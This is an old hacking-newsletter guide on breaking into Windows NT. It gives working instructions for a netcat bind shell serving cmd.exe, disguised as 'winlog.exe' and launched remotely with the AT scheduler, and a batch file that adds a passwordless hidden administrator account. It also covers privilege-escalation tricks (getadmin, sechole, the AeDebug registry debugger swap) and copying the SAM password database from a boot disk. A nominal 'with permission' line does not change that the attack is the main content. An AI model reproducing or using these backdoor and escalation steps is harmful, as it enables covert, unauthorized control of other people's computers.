What's New!

Chat with

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 


Meet the 
Happy Hacksters 

Help for 



It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front


Vol. 3 No. 10 Part 2

How to Break into Windows NT: Backdoors and Practical Jokes (Carolyn's note: this also works with Windows 2000 and XP)

by keydet89@yahoo.com

[Backdoors and Practical Jokes]

Creating backdoors is how you can insure your ability to return to the
system at will. This is almost a black art when dealing with Un*x
systems, and it can also be done on NT.

netcat, from Weld Pond, takes advantage of any user's ability to use
a local port. netcat is a command-line utility that has several
switches used to configure it's operation. This makes netcat, combined
with a properly configured command-line launched from a batch file,
an excellent choice for a backdoor.
(get netcat for NT from http://www.l0pht.com/weld)

The batch file needs to contain:

nc -L -d -p [port] -t -e cmd.exe

L tells netcat to open keep listening after the current
session terminates
d detach - don't open a DOS window when running (IMPORTANT)
p which port to bind to
t enable telnet negotiations
e command to execute upon connection

Copy this command line into a batch file named "runnc.bat" or
something similar. Then copy both the netcat executeable file and
the batch file to a directory that is in the PATH on the target
machine...c:\winnt\system32\ is a good place to hide them. Another
little trick to keep in mind is to rename the netcat executable from
'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to
make the appropriate changes to the batch file). That way, when you
or your buddy opens the TaskList, there won't seem to be any 'unusual'
programs running. Run the batch file on your own machine, and open
the TaskList (right-click on the TaskBar, and choose TaskList)...

Once this batch file is run, all you need to do is connect via telnet,
or netcat in client mode:

c:\>nc -v [ipaddress of target] [port]

So how do you run this batch file? By default, NT doesn't have an
interactive telnet server installed so that you can just log in, so
what do you do? Well, there is a great little service called the
Schedule (or 'AT') service, which lets you schedule programs to be
run at a later date. To see if your Schedule service is running,
you can either click Control Panel -> Services, and check it, or
if you have Perl installed (see above), you can run the following
script to see if the service is running, and if not, start it:

----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# have successfully completed the IPC$ connection and have
# Administrator rights.
# usage: perl atchck.plx

use Win32::Service;
use Win32;
my %status;

Win32::Service::GetStatus('','Schedule', \%status);
die "service is arealdy started\n" if ($status{CurrentState} == 4);

Win32::Service::StartService(Win32::NodeName( ),'Schedule') || die
"Can't start service\n";

print "Service started\n";
#**Note: This script was modified from:
----- end script -----

Note: Only Administrators or members of the Administrators group can
run the AT command.

Once installed, the 'runnc.bat' file can be executed via the AT command.

The necessary syntax for the AT command is:

AT [\\computername] [time] "command"

or more particularly:

AT [\\computername] [time] runnc.bat

References to commands can be hidden in various places within the
registry, set to run when a user logs in:



Note: This last key is where you will find things like AOL's
Instant Messenger. The install puts the reference to the app there,
but you won't find it in your StartUp box...

Here's another little exercise that you should run on your own machine
first, and then try copying it over to a friend's machine and running
it via the AT command. The batch file below uses commands that are
native to NT to create a new user account, then make that user a member
of the Administrator group:

----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----

What are some other neat little tricks to try? Get Netbus from
http://netbus.hypermart.net/ . This little program is similar to
Back Orifice, and it runs on NT. (Visit the makers of Back Orifice
at http://www.cultdeadcow.com/)

Okay, so you and your 'leet buddies have played around with each
other's machines via the Internet, and pretty much walked through the
exercises listed above. Now, what are some local 'attacks' that you
can run against your own machine?

[Local Attacks]

Let's say you have a couple of accounts on your NT box, at least one
with Admin rights, and one or two others with user rights. You've
already run through the password cracking exercise and seen how easy
it is to get the 'SAM._' file and crack it. So what else can you do?

Well, you try the 'getadmin' exploit. This exploit consists of a
program and .dll file that will add the user to the Administrator group.

Get the necessary files from:


The Microsoft site has a hotfix for the "getadmin" exploit, located


General information on security problems addressed by Microsoft
can be found at:


For more information on the 'getadmin' exploit, go to:


and search for 'getadmin'.

All you need to do to test this exploit is log onto your system via
a user account, copy the files into a directory, and run getadmin.exe.

Another local exploit similar to the "getadmin" exploit has popped up.
The exploit works like this: the user runs a program called
"sechole.exe" and the final result (possibly after a reboot) is that
the user now has administrator rights! For more information on this
and the zipped archive "sechole.zip", go to:

A variation on this exploit involves the Registry setting the
determines what the default debugger (the program run when a user mode
program crashes) is run.
Usually, the setting is:
Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value: Debugger
Data Type: REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g

The "Everyone" group has the ability to set the value of this key, and
is essential how you can exploit it. The debugger runs in the security
context of the crashed application, so all you need to do is change the
Default Value (via 'regedit') to point to the User Manager, and then
crash one of the services that are running. Then you can add accounts
to the User Manager...even to the Administrator group.

NEWBIE NOTE: Before any changes are made to the Registry, make
sure that you make a backup of your current Registry using the
"rdisk /s" utility. You can make changes to the Registry by clicking
Start -> Run, and entering either 'regedit' or 'regedt32'. Before
you attempt any of this, read the files pertaining to the Registry
from the Rhino9 site (, the "Hacker's
Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/)
and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).

Another local exploit that you can attempt uses the NTFSDOS utility,
which is nothing more than a bootable DOS diskette that can read (but
not write to) NTFS partitions. This would potentially allow an attacker

to make off with copies of systems files, to include the SAM database.
The folks at Systems Internals (http://www.sysinternals.com) have not
only an NTFSDOS utility available, but also some tools that give the
user limited write capability. SysInternals also has NTRecover and
NTLocksmith, along with a variety of other useful tools.

Get a copy of the utility, and try booting your own system with the
diskette in the A:\ drive.

There is a nifty little utility available, one that is essentially a
Linux boot disk:


The utility comes with rawrite.exe, so that DOS and Windows users can
download the utility and create the Linux boot disk.

The utility is a NTFS-bootable minimal kernel, with a small program
that allows the user to change any password in the SAM database.
Alternatively, you can find the Linux binary file (without the
rawrite.exe utility) at:


called bootdisk.bin, and according to the description, this is the
file you are interested in. You will still need to get a copy of
rawrite.exe, in order to write the information to a diskette in a
useable form.

Carefully read the instructions on the web page for the utility
(listed above) and if you are feeling especially '31337', try it out
against your own system.

[Final Words]

By now you should be familiar with some of the methods used to attack
and compromise an NT system. Hopefully, you have seen fit to try out
the exercises on your own system, or against a friend's system (with
permission, of course). And it should start becoming clear what it
takes to secure a system from attack. The first step is to become
familiar with various exploits by regularly visiting such sites as
RootShell (http://www.rootshell.com), the ISS X-Force site
(http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net),
and NTBugTraq (http://www.ntbugtraq.com). Then go to the Microsoft
Support (http://support.microsoft.com) and Security
(http://www.microsoft.com/security) sites to see what the 'official'
fixes are...the NTBugTraq site does a great job of keeping track of
the latest hotfixes, and which ones are obsolete. The Microsoft Support
site is especially useful, because you can search for information or
specific KnowledgeBase articles, and print out those that you find
useful. The "Hardening NT" document from Santeria Systems
(http://pw2.netcom.com/~honeyluv/index.html) provides an excellent
guide for protecting your system, complete with references to the
appropriate KnowledgeBase article for each step. Finally, Microsoft
maintains a list of security bulletins at:

Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the
kind that led to the creation of the Internet and a new era of freedom of
information. But we hate computer crime. So don't email us about any crimes
you have committed!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email hacker@cmeinel.com with message "subscribe
happy-hacker" in the body of your message.
© 1998 keydet89. You may forward, print out or post this
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave
this notice at the end.


Return to the index of Guides to (mostly) Harmless Hacking!

© 2002 Happy Hacker All rights reserved.